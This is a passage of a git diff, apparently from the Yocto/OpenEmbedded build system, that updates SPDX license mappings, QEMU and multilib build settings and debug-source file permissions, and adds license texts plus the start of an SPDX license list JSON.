SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1"
+SPDXLICENSEMAP[LGPLv2.1+] = "LGPL-2.1+"
+SPDXLICENSEMAP[LGPL-2.1-only] = "LGPL-2.1"
SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0"
+SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0+"
+SPDXLICENSEMAP[LGPL-3.0-only] = "LGPL-3.0"
#MPL variations
SPDXLICENSEMAP[MPL-1] = "MPL-1.0"
diff --git a/meta/conf/machine/include/qemu.inc b/meta/conf/machine/include/qemu.inc
index 8dedb1a42d..7d0a6fe458 100644
--- a/meta/conf/machine/include/qemu.inc
+++ b/meta/conf/machine/include/qemu.inc
@@ -21,7 +21,7 @@ RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""
# Use a common kernel recipe for all QEMU machines
PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
-EXTRA_IMAGEDEPENDS += "qemu-native qemu-helper-native"
+EXTRA_IMAGEDEPENDS += "qemu-system-native qemu-helper-native"
# Provide the nfs server kernel module for all qemu images
KERNEL_FEATURES_append_pn-linux-yocto = " features/nfsd/nfsd-enable.scc"
diff --git a/meta/conf/multilib.conf b/meta/conf/multilib.conf
index d231107f8b..e9767c73b6 100644
--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
+
INHERIT += "multilib_global"
BBCLASSEXTEND_append = " ${MULTILIBS}"
diff --git a/meta/files/common-licenses/Spencer-94 b/meta/files/common-licenses/Spencer-94
new file mode 100644
index 0000000000..75ba7f7d2e
--- /dev/null
+++ b/meta/files/common-licenses/Spencer-94
@@ -0,0 +1,12 @@
+Copyright 1992, 1993, 1994 Henry Spencer. All rights reserved.
+This software is not subject to any license of the American Telephone and Telegraph Company or of the Regents of the University of California.
+
+Permission is granted to anyone to use this software for any purpose on any computer system, and to alter it and redistribute it, subject to the following restrictions:
+
+1. The author is not responsible for the consequences of use of this software, no matter how awful, even if they arise from flaws in it.
+
+2. The origin of this software must not be misrepresented, either by explicit claim or by omission. Since few users ever read sources, credits must appear in the documentation.
+
+3. Altered versions must be plainly marked as such, and must not be misrepresented as being the original software. Since few users ever read sources, credits must appear in the documentation.
+
+4. This notice may not be removed or altered.
diff --git a/meta/files/common-licenses/Unlicense b/meta/files/common-licenses/Unlicense
new file mode 100644
index 0000000000..68a49daad8
--- /dev/null
+++ b/meta/files/common-licenses/Unlicense
@@ -0,0 +1,24 @@
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org/>
diff --git a/meta/files/fs-perms-persistent-log.txt b/meta/files/fs-perms-persistent-log.txt
index 3a7cf3ab94..518c1be3c9 100644
--- a/meta/files/fs-perms-persistent-log.txt
+++ b/meta/files/fs-perms-persistent-log.txt
@@ -41,7 +41,7 @@ ${includedir} 0755 root root true 0644 root root
${oldincludedir} 0755 root root true 0644 root root
# Cleanup debug src
-/usr/src/debug 0755 root root true - root root
+/usr/src/debug 0755 root root true 0644 root root
# Items from base-files
# Links
diff --git a/meta/files/fs-perms.txt b/meta/files/fs-perms.txt
index c8c3ac5dbe..daa4aed840 100644
--- a/meta/files/fs-perms.txt
+++ b/meta/files/fs-perms.txt
@@ -41,7 +41,7 @@ ${includedir} 0755 root root true 0644 root root
${oldincludedir} 0755 root root true 0644 root root
# Cleanup debug src
-/usr/src/debug 0755 root root true - root root
+/usr/src/debug 0755 root root true 0644 root root
# Items from base-files
# Links
diff --git a/meta/files/spdx-licenses.json b/meta/files/spdx-licenses.json
new file mode 100644
index 0000000000..ef926164ec
--- /dev/null
+++ b/meta/files/spdx-licenses.json
@@ -0,0 +1,5937 @@
+{
+ "licenseListVersion": "3.14",
+ "licenses": [
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0.json",
+ "referenceNumber": 0,
+ "name": "GNU General Public License v1.0 only",
+ "licenseId": "GPL-1.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/bzip2-1.0.6.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.6.json",
+ "referenceNumber": 1,
+ "name": "bzip2 and libbzip2 License v1.0.6",
+ "licenseId": "bzip2-1.0.6",
+ "seeAlso": [
+ "https://sourceware.org/git/?p\u003dbzip2.git;a\u003dblob;f\u003dLICENSE;hb\u003dbzip2-1.0.6",
+ "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Intel-ACPI.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Intel-ACPI.json",
+ "referenceNumber": 2,
+ "name": "Intel ACPI Software License Agreement",
+ "licenseId": "Intel-ACPI",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Intel_ACPI_Software_License_Agreement"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/XSkat.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/XSkat.json",
+ "referenceNumber": 3,
+ "name": "XSkat License",
+ "licenseId": "XSkat",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/XSkat_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.json",
+ "referenceNumber": 4,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 Generic",
+ "licenseId": "CC-BY-NC-SA-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Plexus.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Plexus.json",
+ "referenceNumber": 5,
+ "name": "Plexus Classworlds License",
+ "licenseId": "Plexus",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Plexus_Classworlds_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Giftware.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Giftware.json",
+ "referenceNumber": 6,
+ "name": "Giftware License",
+ "licenseId": "Giftware",
+ "seeAlso": [
+ "http://liballeg.org/license.html#allegro-4-the-giftware-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BitTorrent-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.0.json",
+ "referenceNumber": 7,
+ "name": "BitTorrent Open Source License v1.0",
+ "licenseId": "BitTorrent-1.0",
+ "seeAlso": [
+ "http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/licenses/BitTorrent?r1\u003d1.1\u0026r2\u003d1.1.1.1\u0026diff_format\u003ds"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.1.json",
+ "referenceNumber": 8,
+ "name": "Apple Public Source License 1.1",
+ "licenseId": "APSL-1.1",
+ "seeAlso": [
+ "http://www.opensource.apple.com/source/IOSerialFamily/IOSerialFamily-7/APPLE_LICENSE"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.json",
+ "referenceNumber": 9,
+ "name": "GNU General Public License v2.0 w/GCC Runtime Library exception",
+ "licenseId": "GPL-2.0-with-GCC-exception",
+ "seeAlso": [
+ "https://gcc.gnu.org/git/?p\u003dgcc.git;a\u003dblob;f\u003dgcc/libgcc1.c;h\u003d762f5143fc6eed57b6797c82710f3538aa52b40b;hb\u003dcb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/UPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/UPL-1.0.json",
+ "referenceNumber": 10,
+ "name": "Universal Permissive License v1.0",
+ "licenseId": "UPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/UPL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/wxWindows.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/wxWindows.json",
+ "referenceNumber": 11,
+ "name": "wxWindows Library License",
+ "licenseId": "wxWindows",
+ "seeAlso": [
+ "https://opensource.org/licenses/WXwindows"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Caldera.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Caldera.json",
+ "referenceNumber": 12,
+ "name": "Caldera License",
+ "licenseId": "Caldera",
+ "seeAlso": [
+ "http://www.lemis.com/grog/UNIX/ancient-source-all.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zend-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zend-2.0.json",
+ "referenceNumber": 13,
+ "name": "Zend License v2.0",
+ "licenseId": "Zend-2.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20130517195954/http://www.zend.com/license/2_00.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CUA-OPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CUA-OPL-1.0.json",
+ "referenceNumber": 14,
+ "name": "CUA Office Public License v1.0",
+ "licenseId": "CUA-OPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CUA-OPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/JPNIC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JPNIC.json",
+ "referenceNumber": 15,
+ "name": "Japan Network Information Center License",
+ "licenseId": "JPNIC",
+ "seeAlso": [
+ "https://gitlab.isc.org/isc-projects/bind9/blob/master/COPYRIGHT#L366"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SAX-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SAX-PD.json",
+ "referenceNumber": 16,
+ "name": "Sax Public Domain Notice",
+ "licenseId": "SAX-PD",
+ "seeAlso": [
+ "http://www.saxproject.org/copying.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.5.json",
+ "referenceNumber": 17,
+ "name": "Creative Commons Attribution No Derivatives 2.5 Generic",
+ "licenseId": "CC-BY-ND-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/eGenix.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/eGenix.json",
+ "referenceNumber": 18,
+ "name": "eGenix.com Public License 1.1.0",
+ "licenseId": "eGenix",
+ "seeAlso": [
+ "http://www.egenix.com/products/eGenix.com-Public-License-1.1.0.pdf",
+ "https://fedoraproject.org/wiki/Licensing/eGenix.com_Public_License_1.1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPLLR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPLLR.json",
+ "referenceNumber": 19,
+ "name": "Lesser General Public License For Linguistic Resources",
+ "licenseId": "LGPLLR",
+ "seeAlso": [
+ "http://www-igm.univ-mlv.fr/~unitex/lgpllr.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.2.json",
+ "referenceNumber": 20,
+ "name": "Open LDAP Public License 2.2.2",
+ "licenseId": "OLDAP-2.2.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003ddf2cc1e21eb7c160695f5b7cffd6296c151ba188"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.json",
+ "referenceNumber": 21,
+ "name": "Creative Commons Attribution No Derivatives 3.0 Germany",
+ "licenseId": "CC-BY-ND-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IPA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IPA.json",
+ "referenceNumber": 22,
+ "name": "IPA Font License",
+ "licenseId": "IPA",
+ "seeAlso": [
+ "https://opensource.org/licenses/IPA"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NCSA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NCSA.json",
+ "referenceNumber": 23,
+ "name": "University of Illinois/NCSA Open Source License",
+ "licenseId": "NCSA",
+ "seeAlso": [
+ "http://otm.illinois.edu/uiuc_openSource",
+ "https://opensource.org/licenses/NCSA"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C.json",
+ "referenceNumber": 24,
+ "name": "W3C Software Notice and License (2002-12-31)",
+ "licenseId": "W3C",
+ "seeAlso": [
+ "http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231.html",
+ "https://opensource.org/licenses/W3C"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Adobe-2006.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Adobe-2006.json",
+ "referenceNumber": 25,
+ "name": "Adobe Systems Incorporated Source Code License Agreement",
+ "licenseId": "Adobe-2006",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AdobeLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Net-SNMP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Net-SNMP.json",
+ "referenceNumber": 26,
+ "name": "Net-SNMP License",
+ "licenseId": "Net-SNMP",
+ "seeAlso": [
+ "http://net-snmp.sourceforge.net/about/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-4.0.json",
+ "referenceNumber": 27,
+ "name": "Creative Commons Attribution Share Alike 4.0 International",
+ "licenseId": "CC-BY-SA-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/4.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/YPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/YPL-1.0.json",
+ "referenceNumber": 28,
+ "name": "Yahoo! Public License v1.0",
+ "licenseId": "YPL-1.0",
+ "seeAlso": [
+ "http://www.zimbra.com/license/yahoo_public_license_1.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Nunit.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/Nunit.json",
+ "referenceNumber": 29,
+ "name": "Nunit License",
+ "licenseId": "Nunit",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Nunit"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MITNFA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MITNFA.json",
+ "referenceNumber": 30,
+ "name": "MIT +no-false-attribs license",
+ "licenseId": "MITNFA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MITNFA"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PHP-3.01.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PHP-3.01.json",
+ "referenceNumber": 31,
+ "name": "PHP License v3.01",
+ "licenseId": "PHP-3.01",
+ "seeAlso": [
+ "http://www.php.net/license/3_01.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-Source-Code.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-Source-Code.json",
+ "referenceNumber": 32,
+ "name": "BSD Source Code Attribution",
+ "licenseId": "BSD-Source-Code",
+ "seeAlso": [
+ "https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.5.json",
+ "referenceNumber": 33,
+ "name": "Creative Commons Attribution Share Alike 2.5 Generic",
+ "licenseId": "CC-BY-SA-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Motosoto.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Motosoto.json",
+ "referenceNumber": 34,
+ "name": "Motosoto License",
+ "licenseId": "Motosoto",
+ "seeAlso": [
+ "https://opensource.org/licenses/Motosoto"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-1.1.json",
+ "referenceNumber": 35,
+ "name": "Open Software License 1.1",
+ "licenseId": "OSL-1.1",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/OSL1.1"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NGPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NGPL.json",
+ "referenceNumber": 36,
+ "name": "Nethack General Public License",
+ "licenseId": "NGPL",
+ "seeAlso": [
+ "https://opensource.org/licenses/NGPL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.5-AU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5-AU.json",
+ "referenceNumber": 37,
+ "name": "Creative Commons Attribution 2.5 Australia",
+ "licenseId": "CC-BY-2.5-AU",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.5/au/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-TOU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-TOU.json",
+ "referenceNumber": 38,
+ "name": "Unicode Terms of Use",
+ "licenseId": "Unicode-TOU",
+ "seeAlso": [
+ "http://www.unicode.org/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.json",
+ "referenceNumber": 39,
+ "name": "BSD 3-Clause No Nuclear License",
+ "licenseId": "BSD-3-Clause-No-Nuclear-License",
+ "seeAlso": [
+ "http://download.oracle.com/otn-pub/java/licenses/bsd.txt?AuthParam\u003d1467140197_43d516ce1776bd08a58235a7785be1cc"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OPUBL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OPUBL-1.0.json",
+ "referenceNumber": 40,
+ "name": "Open Publication License v1.0",
+ "licenseId": "OPUBL-1.0",
+ "seeAlso": [
+ "http://opencontent.org/openpub/",
+ "https://www.debian.org/opl",
+ "https://www.ctan.org/license/opl"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.json",
+ "referenceNumber": 41,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 England and Wales",
+ "licenseId": "CC-BY-NC-SA-2.0-UK",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/uk/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLOD-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLOD-2.0.json",
+ "referenceNumber": 42,
+ "name": "Norwegian Licence for Open Government Data (NLOD) 2.0",
+ "licenseId": "NLOD-2.0",
+ "seeAlso": [
+ "http://data.norge.no/nlod/en/2.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/gnuplot.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/gnuplot.json",
+ "referenceNumber": 43,
+ "name": "gnuplot License",
+ "licenseId": "gnuplot",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Gnuplot"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPICS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPICS.json",
+ "referenceNumber": 44,
+ "name": "EPICS Open License",
+ "licenseId": "EPICS",
+ "seeAlso": [
+ "https://epics.anl.gov/license/open.php"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Info-ZIP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Info-ZIP.json",
+ "referenceNumber": 45,
+ "name": "Info-ZIP License",
+ "licenseId": "Info-ZIP",
+ "seeAlso": [
+ "http://www.info-zip.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.json",
+ "referenceNumber": 46,
+ "name": "Open LDAP Public License v2.0 (or possibly 2.0A and 2.0B)",
+ "licenseId": "OLDAP-2.0",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcbf50f4e1185a21abd4c0a54d3f4341fe28f36ea"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-P-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-P-2.0.json",
+ "referenceNumber": 47,
+ "name": "CERN Open Hardware Licence Version 2 - Permissive",
+ "licenseId": "CERN-OHL-P-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.json",
+ "referenceNumber": 48,
+ "name": "BSD 3-Clause No Nuclear Warranty",
+ "licenseId": "BSD-3-Clause-No-Nuclear-Warranty",
+ "seeAlso": [
+ "https://jogamp.org/git/?p\u003dgluegen.git;a\u003dblob_plain;f\u003dLICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AML.json",
+ "referenceNumber": 49,
+ "name": "Apple MIT License",
+ "licenseId": "AML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Apple_MIT_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MulanPSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MulanPSL-1.0.json",
+ "referenceNumber": 50,
+ "name": "Mulan Permissive Software License, Version 1",
+ "licenseId": "MulanPSL-1.0",
+ "seeAlso": [
+ "https://license.coscl.org.cn/MulanPSL/",
+ "https://github.com/yuwenlong/longphp/blob/25dfb70cc2a466dc4bb55ba30901cbce08d164b5/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Multics.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Multics.json",
+ "referenceNumber": 51,
+ "name": "Multics License",
+ "licenseId": "Multics",
+ "seeAlso": [
+ "https://opensource.org/licenses/Multics"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/VSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/VSL-1.0.json",
+ "referenceNumber": 52,
+ "name": "Vovida Software License v1.0",
+ "licenseId": "VSL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/VSL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/RSA-MD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RSA-MD.json",
+ "referenceNumber": 53,
+ "name": "RSA Message-Digest License",
+ "licenseId": "RSA-MD",
+ "seeAlso": [
+ "http://www.faqs.org/rfcs/rfc1321.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-PDDC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-PDDC.json",
+ "referenceNumber": 54,
+ "name": "Creative Commons Public Domain Dedication and Certification",
+ "licenseId": "CC-PDDC",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/publicdomain/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.json",
+ "referenceNumber": 55,
+ "name": "Creative Commons Attribution Share Alike 2.1 Japan",
+ "licenseId": "CC-BY-SA-2.1-JP",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.1/jp/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.2.html",
+ "isDeprecatedLicenseId": false,
